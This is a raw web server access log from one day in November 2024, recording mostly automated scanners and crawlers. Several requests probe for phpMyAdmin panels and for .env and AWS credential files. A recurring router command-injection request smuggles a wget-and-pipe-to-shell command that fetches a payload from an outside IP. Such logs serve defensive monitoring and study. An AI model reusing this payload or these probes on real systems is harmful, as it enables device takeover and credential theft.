165.22.10.120 - - [24/Nov/2024:02:30:29 +0100] "GET /__phpmyadmin/index.php?lang=en HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:29 +0100] "GET /phpMyAdmin/index.php?lang=en HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:29 +0100] "GET /administrator/admin/index.php?lang=en HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:29 +0100] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:30 +0100] "GET /sql/sqladmin/index.php?lang=en HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:30 +0100] "GET /sqlmanager/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:30 +0100] "GET /db/dbadmin/index.php?lang=en HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:30 +0100] "GET /program/index.php?lang=en HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:31 +0100] "GET /sql/phpmyadmin5/index.php?lang=en HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:31 +0100] "GET /_phpMyAdmin/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:31 +0100] "GET /phpMyAdmin6/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:31 +0100] "GET /admin/sqladmin/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:32 +0100] "GET /phpMyAdmin-latest-all-languages/index.php?lang=en HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:32 +0100] "GET /phpmyadmin3/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:32 +0100] "GET /mysql/db/index.php?lang=en HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:32 +0100] "GET /db/dbweb/index.php?lang=en HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:32 +0100] "GET /sql/php-myadmin/index.php?lang=en HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:33 +0100] "GET /db/webadmin/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:33 +0100] "GET /phpMyAdmin-4.9.10-all-languages/index.php?lang=en HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:33 +0100] "GET /mysql/pma/index.php?lang=en HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:33 +0100] "GET /phpmyadmin2022/index.php?lang=en HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:34 +0100] "GET /mysql/pMA/index.php?lang=en HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:34 +0100] "GET /phpMyAdmin5/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:34 +0100] "GET /pma/index.php?lang=en HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:34 +0100] "GET /phpMyAdmin-5.2.0-all-languages/index.php?lang=en HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:35 +0100] "GET /phpMyAdmin-5.1.2/index.php?lang=en HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:35 +0100] "GET /phpMyAdmin5.1/index.php?lang=en HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:35 +0100] "GET /_phpmyadmin_/index.php?lang=en HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:35 +0100] "GET /phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:35 +0100] "GET /db/db-admin/index.php?lang=en HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:36 +0100] "GET /db/websql/index.php?lang=en HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:36 +0100] "GET /sql/sql-admin/index.php?lang=en HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:36 +0100] "GET /db/phpmyadmin/index.php?lang=en HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:36 +0100] "GET /database/index.php?lang=en HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:37 +0100] "GET /sql/webdb/index.php?lang=en HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.22.10.120 - - [24/Nov/2024:02:30:37 +0100] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
79.248.53.34 - - [24/Nov/2024:02:34:00 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
156.59.198.136 - - [24/Nov/2024:02:38:12 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103231103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:03:02:18 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001041203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:03:06:18 +0100] "GET /ed.activities.at/stats/lang/awstats-ar.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [24/Nov/2024:03:10:24 +0100] "GET /renault.activities.at/htdocs/binaries/10442911.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
205.210.31.130 - - [24/Nov/2024:03:12:42 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
95.214.53.205 - - [24/Nov/2024:03:14:13 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
125.229.190.28 - - [24/Nov/2024:03:20:15 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
31.220.1.88 - - [24/Nov/2024:03:25:27 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.135 - - [24/Nov/2024:03:44:51 +0100] "GET /docs/ecommlogistics/belege/STORNORE17-00010.PDF HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:03:51:43 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103231603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.50.16.198 - - [24/Nov/2024:03:57:39 +0100] "GET /cgi-bin/index.html HTTP/1.1" 404 363 "-" "-"
156.59.198.136 - - [24/Nov/2024:03:59:59 +0100] "GET /renault.activities.at/htdocs/binaries/10279334.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
114.119.147.233 - - [24/Nov/2024:04:09:22 +0100] "GET /robots.txt HTTP/1.1" 404 291 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
64.62.156.112 - - [24/Nov/2024:04:20:02 +0100] "\x16\x03\x01" 400 383 "-" "-"
141.98.7.248 - - [24/Nov/2024:04:22:31 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
141.98.7.248 - - [24/Nov/2024:04:22:32 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
141.98.7.248 - - [24/Nov/2024:04:22:34 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
184.105.247.194 - - [24/Nov/2024:04:24:02 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
184.105.247.194 - - [24/Nov/2024:04:27:18 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.57"
184.105.247.194 - - [24/Nov/2024:04:27:52 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
114.32.33.169 - - [24/Nov/2024:04:29:06 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
154.213.184.43 - - [24/Nov/2024:04:46:54 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
172.202.248.234 - - [24/Nov/2024:04:54:27 +0100] "MGLNDD_212.69.160.11_80" 400 383 "-" "-"
40.118.214.190 - - [24/Nov/2024:04:54:37 +0100] "GET /portal/redlion HTTP/1.1" 404 286 "-" "Mozilla/5.0 zgrab/0.x"
5.8.11.202 - - [24/Nov/2024:04:58:37 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
48.217.211.118 - - [24/Nov/2024:05:06:14 +0100] "GET /manager/text/list HTTP/1.1" 404 289 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [24/Nov/2024:05:06:36 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image089.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.138.234 - - [24/Nov/2024:05:08:28 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
31.220.1.88 - - [24/Nov/2024:05:10:08 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.136 - - [24/Nov/2024:05:10:36 +0100] "GET /ed.activities.at/stats/lang/awstats-gl.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:05:14:37 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005201103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [24/Nov/2024:05:18:37 +0100] "GET /renault.activities.at/htdocs/binaries/10231944.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.18.99 - - [24/Nov/2024:05:22:39 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.55.11 - - [24/Nov/2024:05:26:37 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.191.98 - - [24/Nov/2024:05:34:18 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [24/Nov/2024:05:43:52 +0100] "GET /hausegger.activities.at/stats/lang/awstats-sr.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.79 - - [24/Nov/2024:05:47:52 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [24/Nov/2024:05:47:53 +0100] "GET /ed.activities.at/stats/lang/awstats-it.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:05:51:52 +0100] "GET /ed.activities.at/stats/lang/awstats-sk.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:06:04:30 +0100] "GET /renault.activities.at/htdocs/binaries/10069856.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:06:08:31 +0100] "GET /renault.activities.at/htdocs/binaries/10661427.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.50.16.198 - - [24/Nov/2024:06:10:59 +0100] "GET /login.asp HTTP/1.1" 404 354 "-" "-"
156.59.198.136 - - [24/Nov/2024:06:28:32 +0100] "GET /docs/contadino/CIT/RE18-00013.pdf HTTP/1.0" 404 301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.220.1.88 - - [24/Nov/2024:06:37:09 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
95.214.55.43 - - [24/Nov/2024:06:38:05 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
164.90.169.92 - - [24/Nov/2024:06:47:04 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
164.90.169.92 - - [24/Nov/2024:06:47:05 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://212.69.160.11/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
45.65.231.69 - - [24/Nov/2024:06:51:28 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
156.59.198.136 - - [24/Nov/2024:06:58:11 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005281103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:07:02:11 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002141503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.53.205 - - [24/Nov/2024:07:06:11 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [24/Nov/2024:07:06:26 +0100] "GET /hausegger.activities.at/stats/lang/awstats-it.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.220.1.88 - - [24/Nov/2024:07:47:37 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.136 - - [24/Nov/2024:07:57:37 +0100] "GET /renault.activities.at/htdocs/binaries/10444274.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.191.98 - - [24/Nov/2024:08:02:02 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
216.24.219.197 - - [24/Nov/2024:08:18:53 +0100] "GET /admin/.env HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15"
216.24.219.225 - - [24/Nov/2024:08:18:53 +0100] "GET /.aws/credentials HTTP/1.1" 404 287 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1"
216.24.219.203 - - [24/Nov/2024:08:18:53 +0100] "GET /backend/.env HTTP/1.1" 404 286 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1"
216.24.219.210 - - [24/Nov/2024:08:18:54 +0100] "GET /.aws/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1"
156.59.198.136 - - [24/Nov/2024:08:25:24 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/vblank.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
147.45.112.158 - - [24/Nov/2024:08:27:45 +0100] "\x03" 400 383 "-" "-"
95.214.53.205 - - [24/Nov/2024:08:32:51 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [24/Nov/2024:08:40:28 +0100] "GET /renault.activities.at/htdocs/binaries/10004287.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.248 - - [24/Nov/2024:08:40:54 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
179.43.191.98 - - [24/Nov/2024:08:41:01 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
194.50.16.198 - - [24/Nov/2024:08:43:51 +0100] "POST /apply.cgi HTTP/1.1" 404 284 "http://212.69.160.11:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
156.59.198.135 - - [24/Nov/2024:08:44:28 +0100] "GET /renault.activities.at/htdocs/binaries/10462863.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.7.248 - - [24/Nov/2024:08:44:56 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
141.98.7.248 - - [24/Nov/2024:08:44:57 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
141.98.7.248 - - [24/Nov/2024:08:44:58 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
93.174.93.12 - - [24/Nov/2024:08:46:09 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; Android 7.0; LGL84VL Build/NRD90U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36"
156.59.198.135 - - [24/Nov/2024:08:48:30 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005150803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.215.236.240 - - [24/Nov/2024:08:51:16 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
156.59.198.135 - - [24/Nov/2024:09:09:11 +0100] "GET /renault.activities.at/htdocs/binaries/10009030.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
